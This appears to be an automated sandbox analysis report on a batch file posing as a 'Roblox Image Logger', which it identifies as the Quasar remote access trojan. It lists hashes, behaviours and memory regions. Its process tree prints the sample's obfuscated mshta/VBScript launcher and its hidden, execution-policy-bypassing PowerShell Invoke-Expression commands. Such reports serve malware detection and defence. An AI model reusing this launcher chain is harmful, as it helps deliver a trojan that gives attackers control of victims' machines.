quasar | bce1a795abd87b0db2ea2577de28ade5f46d275e47f0424fbcd728684f939c0b

Analysis

max time kernel
29s
max time network
30s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
05/04/2024, 21:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Roblox-Image-Logger.bat
Size

14.9MB
MD5

922173bce190a729a7541904e53ffba5
SHA1

d98240a8deb45581eb15e1ec4d5238f914bee80d
SHA256

bce1a795abd87b0db2ea2577de28ade5f46d275e47f0424fbcd728684f939c0b
SHA512

1b4cad22fe047018dc95825b7faaa21b0b0936f1de85886abbf5ca85b59d5fab8da35921758df62fe614e5473b664e6000a95218615bfbd41938149a07e81f5f
SSDEEP

49152:hx3AG5hYogP5o/nsX9xf0HFVpg0bozDhNr2IhX25cDX591URFiVmjGrEcg9FKdzt:g

Score

10^/10

quasar spyware trojan

Malware Config

Extracted

Family

quasar

Attributes

reconnect_delay
1000

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral1/memory/1528-90-0x000002A066600000-0x000002A066DAA000-memory.dmp	family_quasar

Deletes itself 1 IoCs

pid	Process
444	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
4056	$sxr-mshta.exe
2332	$sxr-cmd.exe
1528	$sxr-powershell.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\$sxr-cmd.exe	powershell.exe
File created	C:\Windows\$sxr-powershell.exe	powershell.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	powershell.exe
File created	C:\Windows\$sxr-mshta.exe	powershell.exe
File opened for modification	C:\Windows\$sxr-mshta.exe	powershell.exe
File created	C:\Windows\$sxr-cmd.exe	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	$sxr-mshta.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
444	powershell.exe
444	powershell.exe
444	powershell.exe
444	powershell.exe
444	powershell.exe
444	powershell.exe
1528	$sxr-powershell.exe
1528	$sxr-powershell.exe
1528	$sxr-powershell.exe
1528	$sxr-powershell.exe
1528	$sxr-powershell.exe
1528	$sxr-powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	444	powershell.exe
Token: SeDebugPrivilege	444	powershell.exe
Token: SeDebugPrivilege	444	powershell.exe
Token: SeDebugPrivilege	1528	$sxr-powershell.exe
Token: SeDebugPrivilege	1528	$sxr-powershell.exe
Token: SeDebugPrivilege	1528	$sxr-powershell.exe

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 2168 wrote to memory of 3360	2168	cmd.exe	77
PID 2168 wrote to memory of 3360	2168	cmd.exe	77
PID 2168 wrote to memory of 444	2168	cmd.exe	78
PID 2168 wrote to memory of 444	2168	cmd.exe	78
PID 4056 wrote to memory of 2332	4056	$sxr-mshta.exe	81
PID 4056 wrote to memory of 2332	4056	$sxr-mshta.exe	81
PID 2332 wrote to memory of 3904	2332	$sxr-cmd.exe	83
PID 2332 wrote to memory of 3904	2332	$sxr-cmd.exe	83
PID 2332 wrote to memory of 1528	2332	$sxr-cmd.exe	84
PID 2332 wrote to memory of 1528	2332	$sxr-cmd.exe	84
PID 1528 wrote to memory of 692	1528	$sxr-powershell.exe	7
PID 1528 wrote to memory of 1000	1528	$sxr-powershell.exe	12
PID 1528 wrote to memory of 468	1528	$sxr-powershell.exe	14
PID 1528 wrote to memory of 1028	1528	$sxr-powershell.exe	15
PID 1528 wrote to memory of 1100	1528	$sxr-powershell.exe	17
PID 1528 wrote to memory of 1108	1528	$sxr-powershell.exe	18
PID 1528 wrote to memory of 1176	1528	$sxr-powershell.exe	19
PID 1528 wrote to memory of 1220	1528	$sxr-powershell.exe	20
PID 1528 wrote to memory of 1268	1528	$sxr-powershell.exe	21
PID 1528 wrote to memory of 1304	1528	$sxr-powershell.exe	22
PID 1528 wrote to memory of 1360	1528	$sxr-powershell.exe	23
PID 1528 wrote to memory of 1504	1528	$sxr-powershell.exe	24
PID 1528 wrote to memory of 1576	1528	$sxr-powershell.exe	25
PID 1528 wrote to memory of 1616	1528	$sxr-powershell.exe	26
PID 1528 wrote to memory of 1628	1528	$sxr-powershell.exe	27
PID 1528 wrote to memory of 1636	1528	$sxr-powershell.exe	28
PID 1528 wrote to memory of 1728	1528	$sxr-powershell.exe	29
PID 1528 wrote to memory of 1784	1528	$sxr-powershell.exe	30
PID 1528 wrote to memory of 1828	1528	$sxr-powershell.exe	31
PID 1528 wrote to memory of 1900	1528	$sxr-powershell.exe	32
PID 1528 wrote to memory of 1956	1528	$sxr-powershell.exe	33
PID 1528 wrote to memory of 1964	1528	$sxr-powershell.exe	34
PID 1528 wrote to memory of 1340	1528	$sxr-powershell.exe	35
PID 1528 wrote to memory of 2100	1528	$sxr-powershell.exe	36
PID 1528 wrote to memory of 2120	1528	$sxr-powershell.exe	37

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:1000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:468

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1028

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1100

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1176

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1220
- C:\Windows\$sxr-mshta.exe
  C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-klxianqkZHcQWHMfaKQz4312:PmZbGOPN=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4056
- - C:\Windows\$sxr-cmd.exe
    "C:\Windows\$sxr-cmd.exe" /c %$sxr-klxianqkZHcQWHMfaKQz4312:PmZbGOPN=%
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2332
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:yWIkQKjNdX; "
      4⤵
      PID:3904
  - - C:\Windows\$sxr-powershell.exe
      C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1528

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1504

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1616

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1628

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1728

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1784

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1900

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1964

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2100

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Roblox-Image-Logger.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:wOTwUXbPCP; "
  2⤵
  PID:3360
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
  2⤵
  - Deletes itself
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:444

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
62KB

MD5
e566632d8956997225be604d026c9b39

SHA1
94a9aade75fffc63ed71404b630eca41d3ce130e

SHA256
b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0

SHA512
f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wwbhxazi.m1a.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\$sxr-cmd.exe

Filesize
324KB

MD5
c5db7b712f280c3ae4f731ad7d5ea171

SHA1
e8717ff0d40e01fd3b06de2aa5a401bed1c907cc

SHA256
f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba

SHA512
bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

Download Submit
C:\Windows\$sxr-mshta.exe

Filesize
32KB

MD5
356e04e106f6987a19938df67dea0b76

SHA1
f2fd7cde5f97427e497dfb07b7f682149dc896fb

SHA256
4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e

SHA512
df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
440KB

MD5
0e9ccd796e251916133392539572a374

SHA1
eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

SHA256
c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

SHA512
e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

Download Submit
memory/444-35-0x00000293000B0000-0x00000293000E6000-memory.dmp

Filesize
216KB

Download
memory/444-24-0x000002937EF50000-0x000002937F04C000-memory.dmp

Filesize
1008KB

Download
memory/444-14-0x00007FFCB7760000-0x00007FFCB7969000-memory.dmp

Filesize
2.0MB

Download
memory/444-15-0x00007FFCB7760000-0x00007FFCB7969000-memory.dmp

Filesize
2.0MB

Download
memory/444-16-0x000002937E250000-0x000002937ED38000-memory.dmp

Filesize
10.9MB

Download
memory/444-17-0x00007FFCB6790000-0x00007FFCB684D000-memory.dmp

Filesize
756KB

Download
memory/444-18-0x00007FFCB7760000-0x00007FFCB7969000-memory.dmp

Filesize
2.0MB

Download
memory/444-20-0x00007FFCB7760000-0x00007FFCB7969000-memory.dmp

Filesize
2.0MB

Download
memory/444-21-0x0000029334D00000-0x0000029334D10000-memory.dmp

Filesize
64KB

Download
memory/444-19-0x00007FFC96730000-0x00007FFC971F2000-memory.dmp

Filesize
10.8MB

Download
memory/444-22-0x0000029334D00000-0x0000029334D10000-memory.dmp

Filesize
64KB

Download
memory/444-23-0x00007FFCB7760000-0x00007FFCB7969000-memory.dmp

Filesize
2.0MB

Download
memory/444-38-0x00007FF66AE20000-0x00007FF66AE8E000-memory.dmp

Filesize
440KB

Download
memory/444-25-0x0000029334E20000-0x0000029334E42000-memory.dmp

Filesize
136KB

Download
memory/444-26-0x0000029334E50000-0x0000029334E56000-memory.dmp

Filesize
24KB

Download
memory/444-28-0x000002937F050000-0x000002937F0A8000-memory.dmp

Filesize
352KB

Download
memory/444-27-0x000002934D400000-0x000002934D45E000-memory.dmp

Filesize
376KB

Download
memory/444-29-0x000002931C6E0000-0x000002931C6E6000-memory.dmp

Filesize
24KB

Download
memory/444-30-0x0000029334EB0000-0x0000029334EB8000-memory.dmp

Filesize
32KB

Download
memory/444-31-0x0000029334E40000-0x0000029334E46000-memory.dmp

Filesize
24KB

Download
memory/444-32-0x000002937F0B0000-0x000002937F0EE000-memory.dmp

Filesize
248KB

Download
memory/444-33-0x000002937F0F0000-0x000002937FD16000-memory.dmp

Filesize
12.1MB

Download
memory/444-34-0x0000029300000000-0x00000293000B2000-memory.dmp

Filesize
712KB

Download
memory/444-94-0x00007FFCB7760000-0x00007FFCB7969000-memory.dmp

Filesize
2.0MB

Download
memory/444-13-0x000002937D7A0000-0x000002937E248000-memory.dmp

Filesize
10.7MB

Download
memory/444-96-0x00007FFC96730000-0x00007FFC971F2000-memory.dmp

Filesize
10.8MB

Download
memory/444-36-0x00000293000F0000-0x0000029300148000-memory.dmp

Filesize
352KB

Download
memory/444-39-0x0000029334D00000-0x0000029334D10000-memory.dmp

Filesize
64KB

Download
memory/444-41-0x0000029300180000-0x0000029300188000-memory.dmp

Filesize
32KB

Download
memory/444-42-0x0000000180000000-0x0000000180007000-memory.dmp

Filesize
28KB

Download
memory/444-45-0x00007FFCB7760000-0x00007FFCB7969000-memory.dmp

Filesize
2.0MB

Download
memory/444-53-0x00007FFC95EA8000-0x00007FFC95EA9000-memory.dmp

Filesize
4KB

Download
memory/444-52-0x00007FFCB7760000-0x00007FFCB7969000-memory.dmp

Filesize
2.0MB

Download
memory/444-12-0x0000029334E60000-0x0000029334EA6000-memory.dmp

Filesize
280KB

Download
memory/444-8-0x0000029334CD0000-0x0000029334CF2000-memory.dmp

Filesize
136KB

Download
memory/444-11-0x0000029334D00000-0x0000029334D10000-memory.dmp

Filesize
64KB

Download
memory/444-37-0x0000029300150000-0x000002930017E000-memory.dmp

Filesize
184KB

Download
memory/444-62-0x00007FFCB7760000-0x00007FFCB7969000-memory.dmp

Filesize
2.0MB

Download
memory/444-9-0x00007FFC96730000-0x00007FFC971F2000-memory.dmp

Filesize
10.8MB

Download
memory/444-10-0x0000029334D00000-0x0000029334D10000-memory.dmp

Filesize
64KB

Download
memory/468-129-0x0000022C81BA0000-0x0000022C81BC9000-memory.dmp

Filesize
164KB

Download
memory/468-126-0x00007FFC76BF0000-0x00007FFC76C00000-memory.dmp

Filesize
64KB

Download
memory/468-128-0x0000022C81BA0000-0x0000022C81BC9000-memory.dmp

Filesize
164KB

Download
memory/468-127-0x00007FFC777F0000-0x00007FFC77800000-memory.dmp

Filesize
64KB

Download
memory/692-112-0x00007FFCB7804000-0x00007FFCB7805000-memory.dmp

Filesize
4KB

Download
memory/692-113-0x0000013BEF930000-0x0000013BEF959000-memory.dmp

Filesize
164KB

Download
memory/692-111-0x0000013BEF930000-0x0000013BEF959000-memory.dmp

Filesize
164KB

Download
memory/692-109-0x0000013BEF930000-0x0000013BEF959000-memory.dmp

Filesize
164KB

Download
memory/692-107-0x00007FFC76BF0000-0x00007FFC76C00000-memory.dmp

Filesize
64KB

Download
memory/692-105-0x0000013BEF930000-0x0000013BEF959000-memory.dmp

Filesize
164KB

Download
memory/692-104-0x0000013BEF900000-0x0000013BEF923000-memory.dmp

Filesize
140KB

Download
memory/692-108-0x00007FFC777F0000-0x00007FFC77800000-memory.dmp

Filesize
64KB

Download
memory/1000-117-0x00007FFC76BF0000-0x00007FFC76C00000-memory.dmp

Filesize
64KB

Download
memory/1000-118-0x000001EE03260000-0x000001EE03289000-memory.dmp

Filesize
164KB

Download
memory/1000-122-0x000001EE03260000-0x000001EE03289000-memory.dmp

Filesize
164KB

Download
memory/1000-121-0x000001EE03260000-0x000001EE03289000-memory.dmp

Filesize
164KB

Download
memory/1000-119-0x00007FFC777F0000-0x00007FFC77800000-memory.dmp

Filesize
64KB

Download
memory/1028-135-0x00007FFC76BF0000-0x00007FFC76C00000-memory.dmp

Filesize
64KB

Download
memory/1028-136-0x00007FFC777F0000-0x00007FFC77800000-memory.dmp

Filesize
64KB

Download
memory/1028-140-0x000001F1AC390000-0x000001F1AC3B9000-memory.dmp

Filesize
164KB

Download
memory/1100-145-0x00007FFC76BF0000-0x00007FFC76C00000-memory.dmp

Filesize
64KB

Download
memory/1100-148-0x00000163BBF70000-0x00000163BBF99000-memory.dmp

Filesize
164KB

Download
memory/1100-147-0x00007FFC777F0000-0x00007FFC77800000-memory.dmp

Filesize
64KB

Download
memory/1100-149-0x00000163BBF70000-0x00000163BBF99000-memory.dmp

Filesize
164KB

Download
memory/1108-155-0x00007FFC777F0000-0x00007FFC77800000-memory.dmp

Filesize
64KB

Download
memory/1108-156-0x00000297FB4C0000-0x00000297FB4E9000-memory.dmp

Filesize
164KB

Download
memory/1108-154-0x00007FFC76BF0000-0x00007FFC76C00000-memory.dmp

Filesize
64KB

Download
memory/1108-157-0x00000297FB4C0000-0x00000297FB4E9000-memory.dmp

Filesize
164KB

Download
memory/1176-163-0x00007FFC76BF0000-0x00007FFC76C00000-memory.dmp

Filesize
64KB

Download
memory/1176-164-0x00007FFC777F0000-0x00007FFC77800000-memory.dmp

Filesize
64KB

Download
memory/1176-165-0x000001C55F380000-0x000001C55F3A9000-memory.dmp

Filesize
164KB

Download
memory/1176-166-0x000001C55F380000-0x000001C55F3A9000-memory.dmp

Filesize
164KB

Download
memory/1528-80-0x00007FFCB7760000-0x00007FFCB7969000-memory.dmp

Filesize
2.0MB

Download
memory/1528-77-0x00007FFCB7760000-0x00007FFCB7969000-memory.dmp

Filesize
2.0MB

Download
memory/1528-89-0x000002A0660B0000-0x000002A0665FC000-memory.dmp

Filesize
5.3MB

Download
memory/1528-91-0x000002A066DB0000-0x000002A06713C000-memory.dmp

Filesize
3.5MB

Download
memory/1528-120-0x00007FFCB7760000-0x00007FFCB7969000-memory.dmp

Filesize
2.0MB

Download
memory/1528-92-0x000002A067140000-0x000002A0671F2000-memory.dmp

Filesize
712KB

Download
memory/1528-88-0x000002A044C50000-0x000002A044C56000-memory.dmp

Filesize
24KB

Download
memory/1528-76-0x00007FFCB7760000-0x00007FFCB7969000-memory.dmp

Filesize
2.0MB

Download
memory/1528-75-0x000002A064E10000-0x000002A0654B4000-memory.dmp

Filesize
6.6MB

Download
memory/1528-72-0x000002A044780000-0x000002A044790000-memory.dmp

Filesize
64KB

Download
memory/1528-63-0x000002A044780000-0x000002A044790000-memory.dmp

Filesize
64KB

Download
memory/1528-61-0x00007FFC96730000-0x00007FFC971F2000-memory.dmp

Filesize
10.8MB

Download
memory/1528-131-0x00007FFCB7760000-0x00007FFCB7969000-memory.dmp

Filesize
2.0MB

Download
memory/1528-106-0x000002A044780000-0x000002A044790000-memory.dmp

Filesize
64KB

Download
memory/1528-87-0x000002A044770000-0x000002A044776000-memory.dmp

Filesize
24KB

Download
memory/1528-110-0x000002A044780000-0x000002A044790000-memory.dmp

Filesize
64KB

Download
memory/1528-78-0x000002A0654B0000-0x000002A065B94000-memory.dmp

Filesize
6.9MB

Download
memory/1528-79-0x00007FFCB6790000-0x00007FFCB684D000-memory.dmp

Filesize
756KB

Download
memory/1528-90-0x000002A066600000-0x000002A066DAA000-memory.dmp

Filesize
7.7MB

Download
memory/1528-81-0x00007FFCB7760000-0x00007FFCB7969000-memory.dmp

Filesize
2.0MB

Download
memory/1528-82-0x00007FFC96730000-0x00007FFC971F2000-memory.dmp

Filesize
10.8MB

Download
memory/1528-83-0x00007FFCB7760000-0x00007FFCB7969000-memory.dmp

Filesize
2.0MB

Download
memory/1528-84-0x00007FFCB7760000-0x00007FFCB7969000-memory.dmp

Filesize
2.0MB

Download
memory/1528-101-0x0000000180000000-0x0000000180007000-memory.dmp

Filesize
28KB

Download
memory/1528-97-0x000002A067660000-0x000002A0676A2000-memory.dmp

Filesize
264KB

Download
memory/1528-85-0x000002A044780000-0x000002A044790000-memory.dmp

Filesize
64KB

Download
memory/1528-95-0x000002A0675F0000-0x000002A06765A000-memory.dmp

Filesize
424KB

Download
memory/1528-86-0x00007FFCB7760000-0x00007FFCB7969000-memory.dmp

Filesize
2.0MB

Download